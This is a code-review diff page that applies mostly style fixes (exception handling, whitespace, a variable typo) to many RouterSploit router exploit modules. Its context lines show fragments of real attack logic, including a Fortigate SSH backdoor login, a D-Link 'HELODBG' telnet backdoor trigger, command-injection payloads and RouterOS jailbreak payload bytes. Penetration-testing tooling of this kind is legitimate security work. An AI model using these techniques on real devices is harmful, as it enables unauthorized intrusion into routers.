......@@ -76,8 +74,6 @@ class Exploit(HTTPClient):
cmd = "echo $(({}-1))".format(number)
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
......
routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py
......@@ -48,8 +48,6 @@ class Exploit(HTTPClient):
return False # target is not vulnerable
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = self.http_request(
method="GET",
path="/xslt",
......
routersploit/modules/exploits/routers/3com/imc_info_disclosure.py
......@@ -63,7 +63,7 @@ class Exploit(HTTPClient):
continue
if any(map(lambda x: x in response.text, ["report.db.server.name", "report.db.server.sa.pass", "report.db.server.user.pass"])):
self.valid = path
self.valid = path
return True # target is vulnerable
return False # target not vulnerable
routersploit/modules/exploits/routers/3com/officeconnect_rce.py
......@@ -44,7 +44,7 @@ class Exploit(HTTPClient):
def check(self):
response1 = self.http_request(
method="GET",
path="/utility.cgi?testType=1&IP=aaa",
path="/utility.cgi?testType=1&IP=aaa",
)
if response1 is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/routers/billion/billion_7700nr4_password_disclosure.py
......@@ -46,7 +46,7 @@ class Exploit(HTTPClient):
try:
print_status("Trying to base64 decode")
password = base64.b64decode(res[0])
except:
except Exception:
print_error("Exploit failed - could not decode password")
return
......
routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
......@@ -178,7 +178,7 @@ class Exploit(TCPClient):
print_status("Connection OK")
print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
except:
except Exception:
print_error("Connection failed")
return
......@@ -201,7 +201,7 @@ class Exploit(TCPClient):
try:
t = telnetlib.Telnet(self.target, int(self.telnet_port))
t.interact()
except:
except Exception:
print_error("Exploit failed")
else:
print_status("Check if Telnet authentication was set back")
......
routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py
......@@ -89,7 +89,7 @@ class Exploit(HTTPClient):
path="/login.cgi?logout=1",
data=data,
allow_redirects=False,
timeout=30,
timeout=30,
session=self.session
)
......
routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
......@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient):
"file": (sh_name, payload)
}
try:
self.http_request(
method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data,
session=self.session
)
except:
pass
self.http_request(
method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data,
session=self.session
)
return
......
routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
......@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
if len(res):
try:
b64decode(res[0]) # checking if data is base64 encoded
except:
except Exception:
return False # target is not vulnerable
else:
return False # target is not vulnerable
......
routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
......@@ -61,7 +61,7 @@ class Exploit(HTTPClient):
"SystemCommand": "ls",
"ConfigSystemCommand": "Save"
}
response = self.http_request(
method="POST",
path="/setSystemCommand",
......
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
......@@ -67,7 +67,7 @@ class Exploit(UDPClient):
sock.send(buf)
response = sock.recv(65535)
sock.close()
except:
except Exception:
return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response:
......
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
class Exploit(UDPClient):
__info__ = {
"name": "D-Link DIR-815 & DIR-850L RCE",
......
routersploit/modules/exploits/routers/dlink/dir_850l_creds_disclosure.py
......@@ -25,7 +25,6 @@ class Exploit(HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
self.credentials = []
......
routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py
......@@ -63,7 +63,7 @@ class Exploit(HTTPClient):
"{};echo ffffffffffffffff;".format(cmd)
response = self.http_request(
method="GET",
method="GET",
path=path
)
if response is None:
......
routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py
......@@ -12,7 +12,7 @@ class Exploit(HTTPClient):
"Alvaro Folgado", # vulnerability discovery
"Jose Rodriguez", # vulnerability discovery
"Ivan Sanz", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
),
"references": (
"http://seclists.org/fulldisclosure/2015/May/129",
......
routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py
......@@ -9,7 +9,7 @@ class Exploit(HTTPClient):
"description": "Module exploits remote code execution vulnerability in D-Link DSL-2750B devices. ",
"authors": (
"p@ql", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
"Marcin Bury <marcin[at]threat9.com>", # routersploit module,
),
"references": (
"http://seclists.org/fulldisclosure/2016/Feb/53",
......@@ -45,7 +45,7 @@ class Exploit(HTTPClient):
if response and "DSL-2750B" in response.text:
version = re.findall(r"AYECOM_FWVER=\"(.*?)\";", response.text)
if version:
if utils.Version("1.01") <= utils.Version(version[0]) <= utils.Version("1.03"):
if utils.Version("1.01") <= utils.Version(version[0]) <= utils.Version("1.03"):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
......@@ -44,7 +44,7 @@ class Exploit(HTTPClient):
method="GET",
path="/",
cookies=cookies
)
)
return ""
@mute
......
routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py
from routersploit.core.exploit import *
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......
routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py
......@@ -3,7 +3,6 @@ from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link DWL-3200AP Password Disclosure",
......
routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
......@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient):
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
except:
except Exception:
pass
sock.close()
......@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact()
except:
except Exception:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient):
if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable
except:
except Exception:
pass
return False # target is not vulnerable
routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
......@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
@mute
def check(self):
fingerprint = utils.random_text(10)
cmd = "echo {}".format(fingerprint)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
......
routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link Multi HNAP RCE",
......@@ -52,7 +53,7 @@ class Exploit(HTTPClient):
self.http_request(
method="POST",
path="/HNAP1/",
path="/HNAP1/",
headers=headers
)
return ""
......
routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
......@@ -36,7 +36,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
print_error("Exploit Failed - SSH Service is down")
return
......@@ -45,7 +45,7 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
print_status("Error with Existing Session. Wait few minutes.")
return
......@@ -54,7 +54,7 @@ class Exploit(SSHClient):
print_success("Exploit succeeded")
ssh_interactive(client)
except:
except Exception:
print_error("Exploit failed")
return
......@@ -67,7 +67,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
return False # target is not vulnerable
trans = client.get_transport()
......@@ -75,12 +75,12 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
return None # could not verify
try:
trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
except:
except Exception:
return False # target is not vulnerable
return True # target is vulnerable
......
routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py
......@@ -32,7 +32,7 @@ class Exploit(HTTPClient):
method="GET",
path="/api/wlan/security-settings",
)
if response is None:
return
......
routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
......@@ -72,7 +72,7 @@ class Exploit(UDPClient):
try:
print_status("Waiting for response")
response = sock.recv(1024)
except:
except Exception:
print_error("Exploit failed - device seems to be not vulnerable")
return
......@@ -88,7 +88,7 @@ class Exploit(UDPClient):
try:
response = sock.recv(1024)
except:
except Exception:
return False # target is not vulnerable
if len(response):
......
routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py
......@@ -54,7 +54,7 @@ class Exploit(HTTPClient):
"ACTION2": "snort"
}
response = self.http_request(
self.http_request(
method="POST",
path="/cgi-bin/ids.cgi",
headers=headers,
......@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
version = res[0][0]
update = int(res[0][1])
if Version(version) <= Version("2.19") and udpate <= 110:
if Version(version) <= Version("2.19") and update <= 110:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py
import re
from struct import pack, unpack
from routersploit.core.exploit import *
from routersploit.core.ssh.ssh_client import SSHClient
from routersploit.core.ssh.ssh_client import SSHClient
class Exploit(SSHClient):
......@@ -42,11 +42,11 @@ class Exploit(SSHClient):
if self.backup_restore(backup):
print_success("Jailbreak was (likely) successful.")
print_success("Linux mode can be accessed via telnet using: devel/{}".format(self.password))
else:
else:
print_error("Unable to apply patched configuration")
else:
print_error("Unable to export current configuration")
@mute
def check(self):
self.ssh_client = self.ssh_login(self.username, self.password)
......@@ -54,7 +54,7 @@ class Exploit(SSHClient):
if self.ssh_client:
output = self.ssh_execute(self.ssh_client, "/system resource print")
res = re.findall(b"version: (.+?) ", output)
res = re.findall(b"version: (.+?) ", output)
if res:
version = str(res[0], "utf-8")
if "rc" in version:
......@@ -87,7 +87,7 @@ class Exploit(SSHClient):
matchsize, = unpack("<I", backup[4:8])
if matchsize != realsize:
print_error("File is damaged. Aborting...")
return False
return False
# first we write our payload
payload = (
......@@ -95,7 +95,7 @@ class Exploit(SSHClient):
b"\x6E\x6F\x76\x61\x2F\x65\x74\x63\x2F\x64\x65\x76\x65\x6C\x2D"
b"\x6C\x6F\x67\x69\x6E\x2F\x00\x00\x00\x00\x00\x00\x00\x00"
)
matchsize += len(payload)
matchsize += len(payload)
backup = backup[:4] + pack("<I", matchsize) + backup[8:] + payload
print_status("Patching done")
......@@ -110,6 +110,6 @@ class Exploit(SSHClient):
else:
output = self.ssh_execute(self.ssh_client, "/system backup load name=\"backup.backup\"")
if b"configuration restored" in output:
return True
return True
return False
routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py
import re
from time import sleep
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
......
routersploit/modules/exploits/routers/multi/misfortune_cookie.py
......@@ -142,9 +142,9 @@ class Exploit(HTTPClient):
if response is not None and response.status_code <= 302:
print_success(
"Seems good but check "
+ "{}:{}".format(self.target, self.port)
+ " using your browser to verify if authentication is disabled or not."
"Seems good but check " +
"{}:{} ".format(self.target, self.port) +
"using your browser to verify if authentication is disabled or not."
)
return True
else:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment